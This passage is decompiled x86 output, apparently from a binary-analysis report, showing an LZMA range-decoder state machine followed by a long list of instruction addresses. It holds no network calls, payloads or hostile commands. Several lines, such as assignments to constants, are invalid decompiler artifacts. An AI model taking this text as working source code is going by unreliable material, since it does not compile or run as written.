                                                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          								__eax = 0;
                                                          								__eflags =  *(__ebp - 0x38) - 7;
                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          								__al = __al & 0x000000fd;
                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          								__eax =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 4) + 0x664;
                                                          								__eflags = __eax;
                                                          								 *(__ebp - 0x58) = __eax;
                                                          								goto L69;
                                                          							}
                                                          							__eax =  *(__ebp - 4);
                                                          							__ecx =  *(__ebp - 0x38);
                                                          							 *(__ebp - 0x84) = 8;
                                                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          							goto L132;
                                                          						case 8:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xa;
                                                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x38);
                                                          								__ecx =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 0x38) + 0xf;
                                                          								 *(__ebp - 0x84) = 9;
                                                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          							}
                                                          							goto L132;
                                                          						case 9:
                                                          							goto L0;
                                                          						case 0xa:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xb;
                                                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x28);
                                                          							goto L88;
                                                          						case 0xb:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__ecx =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x20);
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x24);
                                                          							}
                                                          							__ecx =  *(__ebp - 0x28);
                                                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          							L88:
                                                          							__ecx =  *(__ebp - 0x2c);
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          							goto L89;
                                                          						case 0xc:
                                                          							L99:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xc;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t334 = __ebp - 0x70;
                                                          							 *_t334 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t334;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							__eax =  *(__ebp - 0x2c);
                                                          							goto L101;
                                                          						case 0xd:
                                                          							L37:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xd;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t122 = __ebp - 0x70;
                                                          							 *_t122 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t122;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L39:
                                                          							__eax =  *(__ebp - 0x40);
                                                          							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          								goto L48;
                                                          							}
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								goto L54;
                                                          							}
                                                          							L41:
                                                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          							 *(__ebp - 0x48) = __eax;
                                                          							__eax = __eax + 1;
                                                          							__eax = __eax << 8;
                                                          							__eax = __eax + __ebx;
                                                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edx = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								 *(__ebp - 0x40) = 1;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								__ebx = __ebx + __ebx + 1;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edx;
                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L39;
                                                          							} else {
                                                          								goto L37;
                                                          							}
                                                          						case 0xe:
                                                          							L46:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xe;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t156 = __ebp - 0x70;
                                                          							 *_t156 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t156;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							while(1) {
                                                          								L48:
                                                          								__eflags = __ebx - 0x100;
                                                          								if(__ebx >= 0x100) {
                                                          									break;
                                                          								}
                                                          								__eax =  *(__ebp - 0x58);
                                                          								__edx = __ebx + __ebx;
                                                          								__ecx =  *(__ebp - 0x10);
                                                          								__esi = __edx + __eax;
                                                          								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          								__ax =  *__esi;
                                                          								 *(__ebp - 0x54) = __esi;
                                                          								__edi = __ax & 0x0000ffff;
                                                          								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          								__eflags =  *(__ebp - 0xc) - __ecx;
                                                          								if( *(__ebp - 0xc) >= __ecx) {
                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          									__cx = __ax;
                                                          									_t170 = __edx + 1; // 0x1
                                                          									__ebx = _t170;
                                                          									__cx = __ax >> 5;
                                                          									__eflags = __eax;
                                                          									 *__esi = __ax;
                                                          								} else {
                                                          									 *(__ebp - 0x10) = __ecx;
                                                          									0x800 = 0x800 - __edi;
                                                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          									__ebx = __ebx + __ebx;
                                                          									 *__esi = __cx;
                                                          								}
                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                          									continue;
                                                          								} else {
                                                          									goto L46;
                                                          								}
                                                          							}
                                                          							L54:
                                                          							_t173 = __ebp - 0x34;
                                                          							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          							__eflags =  *_t173;
                                                          							goto L55;
                                                          						case 0xf:
                                                          							L58:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xf;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t203 = __ebp - 0x70;
                                                          							 *_t203 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t203;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L60:
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								L55:
                                                          								__al =  *(__ebp - 0x44);
                                                          								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          								goto L56;
                                                          							}
                                                          							L61:
                                                          							__eax =  *(__ebp - 0x58);
                                                          							__edx = __ebx + __ebx;
                                                          							__ecx =  *(__ebp - 0x10);
                                                          							__esi = __edx + __eax;
                                                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								_t217 = __edx + 1; // 0x1
                                                          								__ebx = _t217;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L60;
                                                          							} else {
                                                          								goto L58;
                                                          							}
                                                          						case 0x10:
                                                          							L109:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x10;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t365 = __ebp - 0x70;
                                                          							 *_t365 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t365;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							goto L111;
                                                          						case 0x11:
                                                          							goto L69;
                                                          						case 0x12:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 0x58);
                                                          								 *(__ebp - 0x84) = 0x13;
                                                          								__esi =  *(__ebp - 0x58) + 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							__eflags = __eax;
                                                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          							goto L130;
                                                          						case 0x13:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								_t469 = __ebp - 0x58;
                                                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          								__eflags =  *_t469;
                                                          								 *(__ebp - 0x30) = 0x10;
                                                          								 *(__ebp - 0x40) = 8;
                                                          								L144:
                                                          								 *(__ebp - 0x7c) = 0x14;
                                                          								goto L145;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							 *(__ebp - 0x30) = 8;
                                                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          							L130:
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							 *(__ebp - 0x40) = 3;
                                                          							goto L144;
                                                          						case 0x14:
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          							__eax =  *(__ebp - 0x80);
                                                          							goto L140;
                                                          						case 0x15:
                                                          							__eax = 0;
                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          							__al = __al & 0x000000fd;
                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          							goto L120;
                                                          						case 0x16:
                                                          							__eax =  *(__ebp - 0x30);
                                                          							__eflags = __eax - 4;
                                                          							if(__eax >= 4) {
                                                          								_push(3);
                                                          								_pop(__eax);
                                                          							}
                                                          							__ecx =  *(__ebp - 4);
                                                          							 *(__ebp - 0x40) = 6;
                                                          							__eax = __eax << 7;
                                                          							 *(__ebp - 0x7c) = 0x19;
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							goto L145;
                                                          						case 0x17:
                                                          							L145:
                                                          							__eax =  *(__ebp - 0x40);
                                                          							 *(__ebp - 0x50) = 1;
                                                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          							goto L149;
                                                          						case 0x18:
                                                          							L146:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x18;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t484 = __ebp - 0x70;
                                                          							 *_t484 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t484;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L148:
                                                          							_t487 = __ebp - 0x48;
                                                          							 *_t487 =  *(__ebp - 0x48) - 1;
                                                          							__eflags =  *_t487;
                                                          							L149:
                                                          							__eflags =  *(__ebp - 0x48);
                                                          							if( *(__ebp - 0x48) <= 0) {
                                                          								__ecx =  *(__ebp - 0x40);
                                                          								__ebx =  *(__ebp - 0x50);
                                                          								0 = 1;
                                                          								__eax = 1 << __cl;
                                                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          								__eax =  *(__ebp - 0x7c);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								goto L140;
                                                          							}
                                                          							__eax =  *(__ebp - 0x50);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          							__eax =  *(__ebp - 0x58);
                                                          							__esi = __edx + __eax;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__ax =  *__esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								__cx = __ax >> 5;
                                                          								__eax = __eax - __ecx;
                                                          								__edx = __edx + 1;
                                                          								__eflags = __edx;
                                                          								 *__esi = __ax;
                                                          								 *(__ebp - 0x50) = __edx;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L148;
                                                          							} else {
                                                          								goto L146;
                                                          							}
                                                          						case 0x19:
                                                          							__eflags = __ebx - 4;
                                                          							if(__ebx < 4) {
                                                          								 *(__ebp - 0x2c) = __ebx;
                                                          								L119:
                                                          								_t393 = __ebp - 0x2c;
                                                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          								__eflags =  *_t393;
                                                          								L120:
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								__eflags = __eax;
                                                          								if(__eax == 0) {
                                                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          									goto L170;
                                                          								}
                                                          								__eflags = __eax -  *(__ebp - 0x60);
                                                          								if(__eax >  *(__ebp - 0x60)) {
                                                          									goto L171;
                                                          								}
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          								__eax =  *(__ebp - 0x30);
                                                          								_t400 = __ebp - 0x60;
                                                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          								__eflags =  *_t400;
                                                          								goto L123;
                                                          							}
                                                          							__ecx = __ebx;
                                                          							__eax = __ebx;
                                                          							__ecx = __ebx >> 1;
                                                          							__eax = __ebx & 0x00000001;
                                                          							__ecx = (__ebx >> 1) - 1;
                                                          							__al = __al | 0x00000002;
                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                          							__eflags = __ebx - 0xe;
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							if(__ebx >= 0xe) {
                                                          								__ebx = 0;
                                                          								 *(__ebp - 0x48) = __ecx;
                                                          								L102:
                                                          								__eflags =  *(__ebp - 0x48);
                                                          								if( *(__ebp - 0x48) <= 0) {
                                                          									__eax = __eax + __ebx;
                                                          									 *(__ebp - 0x40) = 4;
                                                          									 *(__ebp - 0x2c) = __eax;
                                                          									__eax =  *(__ebp - 4);
                                                          									__eax =  *(__ebp - 4) + 0x644;
                                                          									__eflags = __eax;
                                                          									L108:
                                                          									__ebx = 0;
                                                          									 *(__ebp - 0x58) = __eax;
                                                          									 *(__ebp - 0x50) = 1;
                                                          									 *(__ebp - 0x44) = 0;
                                                          									 *(__ebp - 0x48) = 0;
                                                          									L112:
                                                          									__eax =  *(__ebp - 0x40);
                                                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          										_t391 = __ebp - 0x2c;
                                                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          										__eflags =  *_t391;
                                                          										goto L119;
                                                          									}
                                                          									__eax =  *(__ebp - 0x50);
                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          									__eax =  *(__ebp - 0x58);
                                                          									__esi = __edi + __eax;
                                                          									 *(__ebp - 0x54) = __esi;
                                                          									__ax =  *__esi;
                                                          									__ecx = __ax & 0x0000ffff;
                                                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          									__eflags =  *(__ebp - 0xc) - __edx;
                                                          									if( *(__ebp - 0xc) >= __edx) {
                                                          										__ecx = 0;
                                                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          										__ecx = 1;
                                                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          										__ebx = 1;
                                                          										__ecx =  *(__ebp - 0x48);
                                                          										__ebx = 1 << __cl;
                                                          										__ecx = 1 << __cl;
                                                          										__ebx =  *(__ebp - 0x44);
                                                          										__ebx =  *(__ebp - 0x44) | __ecx;
                                                          										__cx = __ax;
                                                          										__cx = __ax >> 5;
                                                          										__eax = __eax - __ecx;
                                                          										__edi = __edi + 1;
                                                          										__eflags = __edi;
                                                          										 *(__ebp - 0x44) = __ebx;
                                                          										 *__esi = __ax;
                                                          										 *(__ebp - 0x50) = __edi;
                                                          									} else {
                                                          										 *(__ebp - 0x10) = __edx;
                                                          										0x800 = 0x800 - __ecx;
                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          										 *__esi = __dx;
                                                          									}
                                                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          									if( *(__ebp - 0x10) >= 0x1000000) {
                                                          										L111:
                                                          										_t368 = __ebp - 0x48;
                                                          										 *_t368 =  *(__ebp - 0x48) + 1;
                                                          										__eflags =  *_t368;
                                                          										goto L112;
                                                          									} else {
                                                          										goto L109;
                                                          									}
                                                          								}
                                                          								__ecx =  *(__ebp - 0xc);
                                                          								__ebx = __ebx + __ebx;
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          									__ecx =  *(__ebp - 0x10);
                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          									__ebx = __ebx | 0x00000001;
                                                          									__eflags = __ebx;
                                                          									 *(__ebp - 0x44) = __ebx;
                                                          								}
                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                          									L101:
                                                          									_t338 = __ebp - 0x48;
                                                          									 *_t338 =  *(__ebp - 0x48) - 1;
                                                          									__eflags =  *_t338;
                                                          									goto L102;
                                                          								} else {
                                                          									goto L99;
                                                          								}
                                                          							}
                                                          							__edx =  *(__ebp - 4);
                                                          							__eax = __eax - __ebx;
                                                          							 *(__ebp - 0x40) = __ecx;
                                                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          							goto L108;
                                                          						case 0x1a:
                                                          							L56:
                                                          							__eflags =  *(__ebp - 0x64);
                                                          							if( *(__ebp - 0x64) == 0) {
                                                          								 *(__ebp - 0x88) = 0x1a;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x68);
                                                          							__al =  *(__ebp - 0x5c);
                                                          							__edx =  *(__ebp - 8);
                                                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          							 *( *(__ebp - 0x68)) = __al;
                                                          							__ecx =  *(__ebp - 0x14);
                                                          							 *(__ecx +  *(__ebp - 8)) = __al;
                                                          							__eax = __ecx + 1;
                                                          							__edx = 0;
                                                          							_t192 = __eax %  *(__ebp - 0x74);
                                                          							__eax = __eax /  *(__ebp - 0x74);
                                                          							__edx = _t192;
                                                          							goto L79;
                                                          						case 0x1b:
                                                          							goto L75;
                                                          						case 0x1c:
                                                          							while(1) {
                                                          								L123:
                                                          								__eflags =  *(__ebp - 0x64);
                                                          								if( *(__ebp - 0x64) == 0) {
                                                          									break;
                                                          								}
                                                          								__eax =  *(__ebp - 0x14);
                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                          									__eflags = __eax;
                                                          								}
                                                          								__edx =  *(__ebp - 8);
                                                          								__cl =  *(__eax + __edx);
                                                          								__eax =  *(__ebp - 0x14);
                                                          								 *(__ebp - 0x5c) = __cl;
                                                          								 *(__eax + __edx) = __cl;
                                                          								__eax = __eax + 1;
                                                          								__edx = 0;
                                                          								_t414 = __eax %  *(__ebp - 0x74);
                                                          								__eax = __eax /  *(__ebp - 0x74);
                                                          								__edx = _t414;
                                                          								__eax =  *(__ebp - 0x68);
                                                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          								__eflags =  *(__ebp - 0x30);
                                                          								 *( *(__ebp - 0x68)) = __cl;
                                                          								 *(__ebp - 0x14) = _t414;
                                                          								if( *(__ebp - 0x30) > 0) {
                                                          									continue;
                                                          								} else {
                                                          									goto L80;
                                                          								}
                                                          							}
                                                          							 *(__ebp - 0x88) = 0x1c;
                                                          							goto L170;
                                                          					}
                                                          				}
                                                          			}













                                                          0x00000000
                                                          0x00406527
                                                          0x00406527
                                                          0x0040652b
                                                          0x004068c9
                                                          0x00000000
                                                          0x004068c9
                                                          0x00406531
                                                          0x00406534
                                                          0x00406537
                                                          0x0040653b
                                                          0x0040653e
                                                          0x00406544
                                                          0x00406546
                                                          0x00406546
                                                          0x00406546
                                                          0x00406549
                                                          0x0040654c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040611c
                                                          0x0040611c
                                                          0x00406120
                                                          0x0040688d
                                                          0x00000000
                                                          0x0040688d
                                                          0x00406126
                                                          0x00406129
                                                          0x0040612c
                                                          0x00406130
                                                          0x00406133
                                                          0x00406139
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613e
                                                          0x00406141
                                                          0x00406141
                                                          0x00406144
                                                          0x00406147
                                                          0x00000000
                                                          0x00000000
                                                          0x0040614d
                                                          0x00406153
                                                          0x00000000
                                                          0x00000000
                                                          0x00406159
                                                          0x00406159
                                                          0x0040615d
                                                          0x00406160
                                                          0x00406163
                                                          0x00406166
                                                          0x00406169
                                                          0x0040616a
                                                          0x0040616d
                                                          0x0040616f
                                                          0x00406175
                                                          0x00406178
                                                          0x0040617b
                                                          0x0040617e
                                                          0x00406181
                                                          0x00406184
                                                          0x00406187
                                                          0x004061a3
                                                          0x004061a6
                                                          0x004061a9
                                                          0x004061ac
                                                          0x004061b3
                                                          0x004061b7
                                                          0x004061b9
                                                          0x004061bd
                                                          0x00406189
                                                          0x00406189
                                                          0x0040618d
                                                          0x00406195
                                                          0x0040619a
                                                          0x0040619c
                                                          0x0040619e
                                                          0x0040619e
                                                          0x004061c0
                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061e2
